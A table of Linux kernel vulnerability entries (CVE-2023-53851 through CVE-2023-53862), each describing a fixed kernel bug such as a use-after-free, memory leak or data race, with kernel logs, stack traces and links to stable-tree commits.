| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dp: Drop aux devices together with DP controller Using devres to depopulate the aux bus made sure that upon a probe deferral the EDP panel device would be destroyed and recreated upon next attempt. But the struct device which the devres is tied to is the DPUs (drm_dev->dev), which may be happen after the DP controller is torn down. Indications of this can be seen in the commonly seen EDID-hexdump full of zeros in the log, or the occasional/rare KASAN fault where the panel's attempt to read the EDID information causes a use after free on DP resources. It's tempting to move the devres to the DP controller's struct device, but the resources used by the device(s) on the aux bus are explicitly torn down in the error path. The KASAN-reported use-after-free also remains, as the DP aux "module" explicitly frees its devres-allocated memory in this code path. As such, explicitly depopulate the aux bus in the error path, and in the component unbind path, to avoid these issues. Patchwork: https://patchwork.freedesktop.org/patch/542163/ | 2025-12-09 | not yet calculated | CVE-2023-53851 | https://git.kernel.org/stable/c/e09ed06938807cb113cddd0708ed74bd8cdaff33 https://git.kernel.org/stable/c/2fde37445807e6e6d7981402d0bf1be0e5d81291 https://git.kernel.org/stable/c/a7bfb2ad2184a1fba78be35209b6019aa8cc8d4d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-core: fix memory leak in dhchap_secret_store Free dhchap_secret in nvme_ctrl_dhchap_secret_store() before we return fix following kmemleack:- unreferenced object 0xffff8886376ea800 (size 64): comm "check", pid 22048, jiffies 4344316705 (age 92.199s) hex dump (first 32 bytes): 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL backtrace: [<0000000030ce5d4b>] __kmalloc+0x4b/0x130 [<000000009be1cdc1>] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core] [<00000000ac06c96a>] kernfs_fop_write_iter+0x12b/0x1c0 [<00000000437e7ced>] vfs_write+0x2ba/0x3c0 [<00000000f9491baf>] ksys_write+0x5f/0xe0 [<000000001c46513d>] do_syscall_64+0x3b/0x90 [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc unreferenced object 0xffff8886376eaf00 (size 64): comm "check", pid 22048, jiffies 4344316736 (age 92.168s) hex dump (first 32 bytes): 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL backtrace: [<0000000030ce5d4b>] __kmalloc+0x4b/0x130 [<000000009be1cdc1>] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core] [<00000000ac06c96a>] kernfs_fop_write_iter+0x12b/0x1c0 [<00000000437e7ced>] vfs_write+0x2ba/0x3c0 [<00000000f9491baf>] ksys_write+0x5f/0xe0 [<000000001c46513d>] do_syscall_64+0x3b/0x90 [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc | 2025-12-09 | not yet calculated | CVE-2023-53852 | https://git.kernel.org/stable/c/2e9b141307554521d60fecf6bf1d2edc8dd0181d https://git.kernel.org/stable/c/c41ac086d2abaf7527a5685f9c0a1c209ab7e0aa https://git.kernel.org/stable/c/6a5eda5017959541ab82c5d56bcf784b8294e298 https://git.kernel.org/stable/c/a836ca33c5b07d34dd5347af9f64d25651d12674 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netlink: annotate accesses to nlk->cb_running Both netlink_recvmsg() and netlink_native_seq_show() read nlk->cb_running locklessly. Use READ_ONCE() there. Add corresponding WRITE_ONCE() to netlink_dump() and __netlink_dump_start() syzbot reported: BUG: KCSAN: data-race in __netlink_dump_start / netlink_recvmsg write to 0xffff88813ea4db59 of 1 bytes by task 28219 on cpu 0: __netlink_dump_start+0x3af/0x4d0 net/netlink/af_netlink.c:2399 netlink_dump_start include/linux/netlink.h:308 [inline] rtnetlink_rcv_msg+0x70f/0x8c0 net/core/rtnetlink.c:6130 netlink_rcv_skb+0x126/0x220 net/netlink/af_netlink.c:2577 rtnetlink_rcv+0x1c/0x20 net/core/rtnetlink.c:6192 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0x56f/0x640 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x665/0x770 net/netlink/af_netlink.c:1942 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg net/socket.c:747 [inline] sock_write_iter+0x1aa/0x230 net/socket.c:1138 call_write_iter include/linux/fs.h:1851 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x463/0x760 fs/read_write.c:584 ksys_write+0xeb/0x1a0 fs/read_write.c:637 __do_sys_write fs/read_write.c:649 [inline] __se_sys_write fs/read_write.c:646 [inline] __x64_sys_write+0x42/0x50 fs/read_write.c:646 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd read to 0xffff88813ea4db59 of 1 bytes by task 28222 on cpu 1: netlink_recvmsg+0x3b4/0x730 net/netlink/af_netlink.c:2022 sock_recvmsg_nosec+0x4c/0x80 net/socket.c:1017 ____sys_recvmsg+0x2db/0x310 net/socket.c:2718 ___sys_recvmsg net/socket.c:2762 [inline] do_recvmmsg+0x2e5/0x710 net/socket.c:2856 __sys_recvmmsg net/socket.c:2935 [inline] __do_sys_recvmmsg net/socket.c:2958 [inline] __se_sys_recvmmsg net/socket.c:2951 [inline] __x64_sys_recvmmsg+0xe2/0x160 net/socket.c:2951 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd value changed: 0x00 -> 0x01 | 2025-12-09 | not yet calculated | CVE-2023-53853 | https://git.kernel.org/stable/c/e25e9d8a210ed78bdf0f364576dbee13aefadbf8 https://git.kernel.org/stable/c/840a647499b093621167de56ffa8756dfc69f242 https://git.kernel.org/stable/c/a507022c862e10744a92c4bf5709775450a110ad https://git.kernel.org/stable/c/f92557f79a60cb142258f5fa7194f327573fadd8 https://git.kernel.org/stable/c/1d5c8b01f1df0461256a6d75854ed806f50645a3 https://git.kernel.org/stable/c/a115dadf8995b1730c36c474401d97355705cb88 https://git.kernel.org/stable/c/02e7afd659a4c9ce1e98fc01ab4c510f3de1f0b3 https://git.kernel.org/stable/c/a939d14919b799e6fff8a9c80296ca229ba2f8a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: mt8186: Fix use-after-free in driver remove path When devm runs function in the "remove" path for a device it runs them in the reverse order. That means that if you have parts of your driver that aren't using devm or are using "roll your own" devm w/ devm_add_action_or_reset() you need to keep that in mind. The mt8186 audio driver didn't quite get this right. Specifically, in mt8186_init_clock() it called mt8186_audsys_clk_register() and then went on to call a bunch of other devm function. The caller of mt8186_init_clock() used devm_add_action_or_reset() to call mt8186_deinit_clock() but, because of the intervening devm functions, the order was wrong. Specifically at probe time, the order was: 1. mt8186_audsys_clk_register() 2. afe_priv->clk = devm_kcalloc(...) 3. afe_priv->clk[i] = devm_clk_get(...) At remove time, the order (which should have been 3, 2, 1) was: 1. mt8186_audsys_clk_unregister() 3. Free all of afe_priv->clk[i] 2. Free afe_priv->clk The above seemed to be causing a use-after-free. Luckily, it's easy to fix this by simply using devm more correctly. Let's move the devm_add_action_or_reset() to the right place. In addition to fixing the use-after-free, code inspection shows that this fixes a leak (missing call to mt8186_audsys_clk_unregister()) that would have happened if any of the syscon_regmap_lookup_by_phandle() calls in mt8186_init_clock() had failed. | 2025-12-09 | not yet calculated | CVE-2023-53854 | https://git.kernel.org/stable/c/3e56a1c04882852e3e7d6c59756a16211ebbc457 https://git.kernel.org/stable/c/dffd9e2b57cb845930fa885aa634a847ba2130dd https://git.kernel.org/stable/c/a93d2afd3f77a7331271a0f25c6a11003db69b3c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: ocelot: call dsa_tag_8021q_unregister() under rtnl_lock() on driver remove When the tagging protocol in current use is "ocelot-8021q" and we unbind the driver, we see this splat: $ echo '0000:00:00.2' > /sys/bus/pci/drivers/fsl_enetc/unbind mscc_felix 0000:00:00.5 swp0: left promiscuous mode sja1105 spi2.0: Link is Down DSA: tree 1 torn down mscc_felix 0000:00:00.5 swp2: left promiscuous mode sja1105 spi2.2: Link is Down DSA: tree 3 torn down fsl_enetc 0000:00:00.2 eno2: left promiscuous mode mscc_felix 0000:00:00.5: Link is Down ------------[ cut here ]------------ RTNL: assertion failed at net/dsa/tag_8021q.c (409) WARNING: CPU: 1 PID: 329 at net/dsa/tag_8021q.c:409 dsa_tag_8021q_unregister+0x12c/0x1a0 Modules linked in: CPU: 1 PID: 329 Comm: bash Not tainted 6.5.0-rc3+ #771 pc : dsa_tag_8021q_unregister+0x12c/0x1a0 lr : dsa_tag_8021q_unregister+0x12c/0x1a0 Call trace: dsa_tag_8021q_unregister+0x12c/0x1a0 felix_tag_8021q_teardown+0x130/0x150 felix_teardown+0x3c/0xd8 dsa_tree_teardown_switches+0xbc/0xe0 dsa_unregister_switch+0x168/0x260 felix_pci_remove+0x30/0x60 pci_device_remove+0x4c/0x100 device_release_driver_internal+0x188/0x288 device_links_unbind_consumers+0xfc/0x138 device_release_driver_internal+0xe0/0x288 device_driver_detach+0x24/0x38 unbind_store+0xd8/0x108 drv_attr_store+0x30/0x50 ---[ end trace 0000000000000000 ]--- ------------[ cut here ]------------ RTNL: assertion failed at net/8021q/vlan_core.c (376) WARNING: CPU: 1 PID: 329 at net/8021q/vlan_core.c:376 vlan_vid_del+0x1b8/0x1f0 CPU: 1 PID: 329 Comm: bash Tainted: G W 6.5.0-rc3+ #771 pc : vlan_vid_del+0x1b8/0x1f0 lr : vlan_vid_del+0x1b8/0x1f0 dsa_tag_8021q_unregister+0x8c/0x1a0 felix_tag_8021q_teardown+0x130/0x150 felix_teardown+0x3c/0xd8 dsa_tree_teardown_switches+0xbc/0xe0 dsa_unregister_switch+0x168/0x260 felix_pci_remove+0x30/0x60 pci_device_remove+0x4c/0x100 device_release_driver_internal+0x188/0x288 device_links_unbind_consumers+0xfc/0x138 device_release_driver_internal+0xe0/0x288 device_driver_detach+0x24/0x38 unbind_store+0xd8/0x108 drv_attr_store+0x30/0x50 DSA: tree 0 torn down This was somewhat not so easy to spot, because "ocelot-8021q" is not the default tagging protocol, and thus, not everyone who tests the unbinding path may have switched to it beforehand. The default felix_tag_npi_teardown() does not require rtnl_lock() to be held. | 2025-12-09 | not yet calculated | CVE-2023-53855 | https://git.kernel.org/stable/c/758dbcfb257e1aee0a310bae789c2af6ffe35d0f https://git.kernel.org/stable/c/7ae8fa6b70975b6efbbef7912d09bff5a0bff491 https://git.kernel.org/stable/c/a94c16a2fda010866b8858a386a8bfbeba4f72c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: overlay: Call of_changeset_init() early When of_overlay_fdt_apply() fails, the changeset may be partially applied, and the caller is still expected to call of_overlay_remove() to clean up this partial state. However, of_overlay_apply() calls of_resolve_phandles() before init_overlay_changeset(). Hence if the overlay fails to apply due to an unresolved symbol, the overlay_changeset.cset.entries list is still uninitialized, and cleanup will crash with a NULL-pointer dereference in overlay_removal_is_ok(). Fix this by moving the call to of_changeset_init() from init_overlay_changeset() to of_overlay_fdt_apply(), where all other early initialization is done. | 2025-12-09 | not yet calculated | CVE-2023-53856 | https://git.kernel.org/stable/c/01bb96ad38089f5cc6de7746dac13437d35eb1dc https://git.kernel.org/stable/c/3fb210cd521c9efcb211e9f5ce40fc907200bf13 https://git.kernel.org/stable/c/be86241bf5d1efd16d8a7231c13b33459c5d755d https://git.kernel.org/stable/c/c403c81b577a67fe9ec6a2e89d143256487be50f https://git.kernel.org/stable/c/a9515ff4fb142b690a0d2b58782b15903b990dba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: bpf_sk_storage: Fix invalid wait context lockdep report './test_progs -t test_local_storage' reported a splat: [ 27.137569] ============================= [ 27.138122] [ BUG: Invalid wait context ] [ 27.138650] 6.5.0-03980-gd11ae1b16b0a #247 Tainted: G O [ 27.139542] ----------------------------- [ 27.140106] test_progs/1729 is trying to lock: [ 27.140713] ffff8883ef047b88 (stock_lock){-.-.}-{3:3}, at: local_lock_acquire+0x9/0x130 [ 27.141834] other info that might help us debug this: [ 27.142437] context-{5:5} [ 27.142856] 2 locks held by test_progs/1729: [ 27.143352] #0: ffffffff84bcd9c0 (rcu_read_lock){....}-{1:3}, at: rcu_lock_acquire+0x4/0x40 [ 27.144492] #1: ffff888107deb2c0 (&storage->lock){..-.}-{2:2}, at: bpf_local_storage_update+0x39e/0x8e0 [ 27.145855] stack backtrace: [ 27.146274] CPU: 0 PID: 1729 Comm: test_progs Tainted: G O 6.5.0-03980-gd11ae1b16b0a #247 [ 27.147550] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 27.149127] Call Trace: [ 27.149490] <TASK> [ 27.149867] dump_stack_lvl+0x130/0x1d0 [ 27.152609] dump_stack+0x14/0x20 [ 27.153131] __lock_acquire+0x1657/0x2220 [ 27.153677] lock_acquire+0x1b8/0x510 [ 27.157908] local_lock_acquire+0x29/0x130 [ 27.159048] obj_cgroup_charge+0xf4/0x3c0 [ 27.160794] slab_pre_alloc_hook+0x28e/0x2b0 [ 27.161931] __kmem_cache_alloc_node+0x51/0x210 [ 27.163557] __kmalloc+0xaa/0x210 [ 27.164593] bpf_map_kzalloc+0xbc/0x170 [ 27.165147] bpf_selem_alloc+0x130/0x510 [ 27.166295] bpf_local_storage_update+0x5aa/0x8e0 [ 27.167042] bpf_fd_sk_storage_update_elem+0xdb/0x1a0 [ 27.169199] bpf_map_update_value+0x415/0x4f0 [ 27.169871] map_update_elem+0x413/0x550 [ 27.170330] __sys_bpf+0x5e9/0x640 [ 27.174065] __x64_sys_bpf+0x80/0x90 [ 27.174568] do_syscall_64+0x48/0xa0 [ 27.175201] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 [ 27.175932] RIP: 0033:0x7effb40e41ad [ 27.176357] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d8 [ 27.179028] RSP: 002b:00007ffe64c21fc8 EFLAGS: 00000202 ORIG_RAX: 0000000000000141 [ 27.180088] RAX: ffffffffffffffda RBX: 00007ffe64c22768 RCX: 00007effb40e41ad [ 27.181082] RDX: 0000000000000020 RSI: 00007ffe64c22008 RDI: 0000000000000002 [ 27.182030] RBP: 00007ffe64c21ff0 R08: 0000000000000000 R09: 00007ffe64c22788 [ 27.183038] R10: 0000000000000064 R11: 0000000000000202 R12: 0000000000000000 [ 27.184006] R13: 00007ffe64c22788 R14: 00007effb42a1000 R15: 0000000000000000 [ 27.184958] </TASK> It complains about acquiring a local_lock while holding a raw_spin_lock. It means it should not allocate memory while holding a raw_spin_lock since it is not safe for RT. raw_spin_lock is needed because bpf_local_storage supports tracing context. In particular for task local storage, it is easy to get a "current" task PTR_TO_BTF_ID in tracing bpf prog. However, task (and cgroup) local storage has already been moved to bpf mem allocator which can be used after raw_spin_lock. The splat is for the sk storage. For sk (and inode) storage, it has not been moved to bpf mem allocator. Using raw_spin_lock or not, kzalloc(GFP_ATOMIC) could theoretically be unsafe in tracing context. However, the local storage helper requires a verifier accepted sk pointer (PTR_TO_BTF_ID), it is hypothetical if that (mean running a bpf prog in a kzalloc unsafe context and also able to hold a verifier accepted sk pointer) could happen. This patch avoids kzalloc after raw_spin_lock to silent the splat. There is an existing kzalloc before the raw_spin_lock. At that point, a kzalloc is very likely required because a lookup has just been done before. Thus, this patch always does the kzalloc before acq ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53857 | https://git.kernel.org/stable/c/300415caa373a07782fcbc2f8d9429bc2dc27a47 https://git.kernel.org/stable/c/a96a44aba556c42b432929d37d60158aca21ad4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: samsung_tty: Fix a memory leak in s3c24xx_serial_getclk() in case of error If clk_get_rate() fails, the clk that has just been allocated needs to be freed. | 2025-12-09 | not yet calculated | CVE-2023-53858 | https://git.kernel.org/stable/c/755289d67eb9a74ae71bb624902e979c66859444 https://git.kernel.org/stable/c/f47e6631a8fcc6fe05b8644aa4222a60f3b0a927 https://git.kernel.org/stable/c/30962268fa1a7466413b3d83037688129021d470 https://git.kernel.org/stable/c/a49e5a05121c8bc471a57b4916c5393749c24de5 https://git.kernel.org/stable/c/073dbbe5743779faf24f233cc95459b47c7198dd https://git.kernel.org/stable/c/34f5b826dd509b76644f83094b4af7e7668a6a38 https://git.kernel.org/stable/c/1694fc8ad734e2909a9e40d2be03cc4423e0bee6 https://git.kernel.org/stable/c/a9c09546e903f1068acfa38e1ee18bded7114b37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/idle: mark arch_cpu_idle() noinstr linux-next commit ("cpuidle: tracing: Warn about !rcu_is_watching()") adds a new warning which hits on s390's arch_cpu_idle() function: RCU not on for: arch_cpu_idle+0x0/0x28 WARNING: CPU: 2 PID: 0 at include/linux/trace_recursion.h:162 arch_ftrace_ops_list_func+0x24c/0x258 Modules linked in: CPU: 2 PID: 0 Comm: swapper/2 Not tainted 6.2.0-rc6-next-20230202 #4 Hardware name: IBM 8561 T01 703 (z/VM 7.3.0) Krnl PSW : 0404d00180000000 00000000002b55c0 (arch_ftrace_ops_list_func+0x250/0x258) R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:1 PM:0 RI:0 EA:3 Krnl GPRS: c0000000ffffbfff 0000000080000002 0000000000000026 0000000000000000 0000037ffffe3a28 0000037ffffe3a20 0000000000000000 0000000000000000 0000000000000000 0000000000f4acf6 00000000001044f0 0000037ffffe3cb0 0000000000000000 0000000000000000 00000000002b55bc 0000037ffffe3bb8 Krnl Code: 00000000002b55b0: c02000840051 larl %r2,0000000001335652 00000000002b55b6: c0e5fff512d1 brasl %r14,0000000000157b58 #00000000002b55bc: af000000 mc 0,0 >00000000002b55c0: a7f4ffe7 brc 15,00000000002b558e 00000000002b55c4: 0707 bcr 0,%r7 00000000002b55c6: 0707 bcr 0,%r7 00000000002b55c8: eb6ff0480024 stmg %r6,%r15,72(%r15) 00000000002b55ce: b90400ef lgr %r14,%r15 Call Trace: [<00000000002b55c0>] arch_ftrace_ops_list_func+0x250/0x258 ([<00000000002b55bc>] arch_ftrace_ops_list_func+0x24c/0x258) [<0000000000f5f0fc>] ftrace_common+0x1c/0x20 [<00000000001044f6>] arch_cpu_idle+0x6/0x28 [<0000000000f4acf6>] default_idle_call+0x76/0x128 [<00000000001cc374>] do_idle+0xf4/0x1b0 [<00000000001cc6ce>] cpu_startup_entry+0x36/0x40 [<0000000000119d00>] smp_start_secondary+0x140/0x150 [<0000000000f5d2ae>] restart_int_handler+0x6e/0x90 Mark arch_cpu_idle() noinstr like all other architectures with CONFIG_ARCH_WANTS_NO_INSTR (should) have it to fix this. | 2025-12-09 | not yet calculated | CVE-2023-53859 | https://git.kernel.org/stable/c/49aa49952116b8fd56bfb1e8c69bce179f49bece https://git.kernel.org/stable/c/611c390217106c46e24e1af3db83187339d447ea https://git.kernel.org/stable/c/fc60c4f12d8a056f20d8f4d0086a36c68ffa9fdc https://git.kernel.org/stable/c/a9cbc1b471d291c865907542394f1c483b93a811 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: don't attempt to queue IO under RCU protection dm looks up the table for IO based on the request type, with an assumption that if the request is marked REQ_NOWAIT, it's fine to attempt to submit that IO while under RCU read lock protection. This is not OK, as REQ_NOWAIT just means that we should not be sleeping waiting on other IO, it does not mean that we can't potentially schedule. A simple test case demonstrates this quite nicely: int main(int argc, char *argv[]) { struct iovec iov; int fd; fd = open("/dev/dm-0", O_RDONLY | O_DIRECT); posix_memalign(&iov.iov_base, 4096, 4096); iov.iov_len = 4096; preadv2(fd, &iov, 1, 0, RWF_NOWAIT); return 0; } which will instantly spew: BUG: sleeping function called from invalid context at include/linux/sched/mm.h:306 in_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 5580, name: dm-nowait preempt_count: 0, expected: 0 RCU nest depth: 1, expected: 0 INFO: lockdep is turned off. CPU: 7 PID: 5580 Comm: dm-nowait Not tainted 6.6.0-rc1-g39956d2dcd81 #132 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x11d/0x1b0 __might_resched+0x3c3/0x5e0 ? preempt_count_sub+0x150/0x150 mempool_alloc+0x1e2/0x390 ? mempool_resize+0x7d0/0x7d0 ? lock_sync+0x190/0x190 ? lock_release+0x4b7/0x670 ? internal_get_user_pages_fast+0x868/0x2d40 bio_alloc_bioset+0x417/0x8c0 ? bvec_alloc+0x200/0x200 ? internal_get_user_pages_fast+0xb8c/0x2d40 bio_alloc_clone+0x53/0x100 dm_submit_bio+0x27f/0x1a20 ? lock_release+0x4b7/0x670 ? blk_try_enter_queue+0x1a0/0x4d0 ? dm_dax_direct_access+0x260/0x260 ? rcu_is_watching+0x12/0xb0 ? blk_try_enter_queue+0x1cc/0x4d0 __submit_bio+0x239/0x310 ? __bio_queue_enter+0x700/0x700 ? kvm_clock_get_cycles+0x40/0x60 ? ktime_get+0x285/0x470 submit_bio_noacct_nocheck+0x4d9/0xb80 ? should_fail_request+0x80/0x80 ? preempt_count_sub+0x150/0x150 ? lock_release+0x4b7/0x670 ? __bio_add_page+0x143/0x2d0 ? iov_iter_revert+0x27/0x360 submit_bio_noacct+0x53e/0x1b30 submit_bio_wait+0x10a/0x230 ? submit_bio_wait_endio+0x40/0x40 __blkdev_direct_IO_simple+0x4f8/0x780 ? blkdev_bio_end_io+0x4c0/0x4c0 ? stack_trace_save+0x90/0xc0 ? __bio_clone+0x3c0/0x3c0 ? lock_release+0x4b7/0x670 ? lock_sync+0x190/0x190 ? atime_needs_update+0x3bf/0x7e0 ? timestamp_truncate+0x21b/0x2d0 ? inode_owner_or_capable+0x240/0x240 blkdev_direct_IO.part.0+0x84a/0x1810 ? rcu_is_watching+0x12/0xb0 ? lock_release+0x4b7/0x670 ? blkdev_read_iter+0x40d/0x530 ? reacquire_held_locks+0x4e0/0x4e0 ? __blkdev_direct_IO_simple+0x780/0x780 ? rcu_is_watching+0x12/0xb0 ? __mark_inode_dirty+0x297/0xd50 ? preempt_count_add+0x72/0x140 blkdev_read_iter+0x2a4/0x530 do_iter_readv_writev+0x2f2/0x3c0 ? generic_copy_file_range+0x1d0/0x1d0 ? fsnotify_perm.part.0+0x25d/0x630 ? security_file_permission+0xd8/0x100 do_iter_read+0x31b/0x880 ? import_iovec+0x10b/0x140 vfs_readv+0x12d/0x1a0 ? vfs_iter_read+0xb0/0xb0 ? rcu_is_watching+0x12/0xb0 ? rcu_is_watching+0x12/0xb0 ? lock_release+0x4b7/0x670 do_preadv+0x1b3/0x260 ? do_readv+0x370/0x370 __x64_sys_preadv2+0xef/0x150 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f5af41ad806 Code: 41 54 41 89 fc 55 44 89 c5 53 48 89 cb 48 83 ec 18 80 3d e4 dd 0d 00 00 74 7a 45 89 c1 49 89 ca 45 31 c0 b8 47 01 00 00 0f 05 <48> 3d 00 f0 ff ff 0f 87 be 00 00 00 48 85 c0 79 4a 48 8b 0d da 55 RSP: 002b:00007ffd3145c7f0 EFLAGS: 00000246 ORIG_RAX: 0000000000000147 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5af41ad806 RDX: 0000000000000001 RSI: 00007ffd3145c850 RDI: 0000000000000003 RBP: 0000000000000008 R08: 0000000000000000 R09: 0000000000000008 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000003 R13: 00007ffd3145c850 R14: 000055f5f0431dd8 R15: 0000000000000001 </TASK> where in fact it is ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53860 | https://git.kernel.org/stable/c/d7b2abd87d1fcdb47811f90090a363e7ca15cb14 https://git.kernel.org/stable/c/699775e9338adcd4eaedea000d32c60250c3114d https://git.kernel.org/stable/c/a9ce385344f916cd1c36a33905e564f5581beae9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: correct grp validation in ext4_mb_good_group Group corruption check will access memory of grp and will trigger kernel crash if grp is NULL. So do NULL check before corruption check. | 2025-12-09 | not yet calculated | CVE-2023-53861 | https://git.kernel.org/stable/c/245759d987b617d183061db6ab8886ebb5cc78e9 https://git.kernel.org/stable/c/3e24082f16825279054a2b8a5e668d65070bbf07 https://git.kernel.org/stable/c/772ca4bc1d0d21320ef2ecc0f9e4f90ea85a035d https://git.kernel.org/stable/c/83a9d5f5ec7e75640b1ba0bbd77a4888df798bb4 https://git.kernel.org/stable/c/e69d665987db0e37896adf78a7e718f9a0a75d3f https://git.kernel.org/stable/c/a9ce5993a0f5c0887c8a1b4ffa3b8046fbcfdc93 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: fix missing hfs_bnode_get() in __hfs_bnode_create Syzbot found a kernel BUG in hfs_bnode_put(): kernel BUG at fs/hfs/bnode.c:466! invalid opcode: 0000 [#1] PREEMPT SMP KASAN CPU: 0 PID: 3634 Comm: kworker/u4:5 Not tainted 6.1.0-rc7-syzkaller-00190-g97ee9d1c1696 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/26/2022 Workqueue: writeback wb_workfn (flush-7:0) RIP: 0010:hfs_bnode_put+0x46f/0x480 fs/hfs/bnode.c:466 Code: 8a 80 ff e9 73 fe ff ff 89 d9 80 e1 07 80 c1 03 38 c1 0f 8c a0 fe ff ff 48 89 df e8 db 8a 80 ff e9 93 fe ff ff e8 a1 68 2c ff <0f> 0b e8 9a 68 2c ff 0f 0b 0f 1f 84 00 00 00 00 00 55 41 57 41 56 RSP: 0018:ffffc90003b4f258 EFLAGS: 00010293 RAX: ffffffff825e318f RBX: 0000000000000000 RCX: ffff8880739dd7c0 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc90003b4f430 R08: ffffffff825e2d9b R09: ffffed10045157d1 R10: ffffed10045157d1 R11: 1ffff110045157d0 R12: ffff8880228abe80 R13: ffff88807016c000 R14: dffffc0000000000 R15: ffff8880228abe00 FS: 0000000000000000(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa6ebe88718 CR3: 000000001e93d000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> hfs_write_inode+0x1bc/0xb40 write_inode fs/fs-writeback.c:1440 [inline] __writeback_single_inode+0x4d6/0x670 fs/fs-writeback.c:1652 writeback_sb_inodes+0xb3b/0x18f0 fs/fs-writeback.c:1878 __writeback_inodes_wb+0x125/0x420 fs/fs-writeback.c:1949 wb_writeback+0x440/0x7b0 fs/fs-writeback.c:2054 wb_check_start_all fs/fs-writeback.c:2176 [inline] wb_do_writeback fs/fs-writeback.c:2202 [inline] wb_workfn+0x827/0xef0 fs/fs-writeback.c:2235 process_one_work+0x877/0xdb0 kernel/workqueue.c:2289 worker_thread+0xb14/0x1330 kernel/workqueue.c:2436 kthread+0x266/0x300 kernel/kthread.c:376 ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306 </TASK> The BUG_ON() is triggered at here: /* Dispose of resources used by a node */ void hfs_bnode_put(struct hfs_bnode *node) { if (node) { <skipped> BUG_ON(!atomic_read(&node->refcnt)); <- we have issue here!!!! <skipped> } } By tracing the refcnt, I found the node is created by hfs_bmap_alloc() with refcnt 1. Then the node is used by hfs_btree_write(). There is a missing of hfs_bnode_get() after find the node. The issue happened in following path: <alloc> hfs_bmap_alloc hfs_bnode_find __hfs_bnode_create <- allocate a new node with refcnt 1. hfs_bnode_put <- decrease the refcnt <write> hfs_btree_write hfs_bnode_find __hfs_bnode_create hfs_bnode_findhash <- find the node without refcnt increased. hfs_bnode_put <- trigger the BUG_ON() since refcnt is 0. | 2025-12-09 | not yet calculated | CVE-2023-53862 | https://git.kernel.org/stable/c/062af3e9930762d1fd22946748d34e0d859e4a8e https://git.kernel.org/stable/c/3a9065a33988c02789722be612f7c42fb8ebbb22 https://git.kernel.org/stable/c/eda6879272e4df5456afc36642052ea066f58410 https://git.kernel.org/stable/c/dc9f78b6d254427a06e568f2887b1011ef3143ef https://git.kernel.org/stable/c/2cab8db14566cf6a516c1f103a60cf6b7f54b1e5 https://git.kernel.org/stable/c/8140cdc57bc5844cd5e1392673ec2dbf8fdc6940 https://git.kernel.org/stable/c/38d72e6604b9f96dffcc0565090cc01622a37b2a https://git.kernel.org/stable/c/a9dc087fd3c484fd1ed18c5efb290efaaf44ce03 |
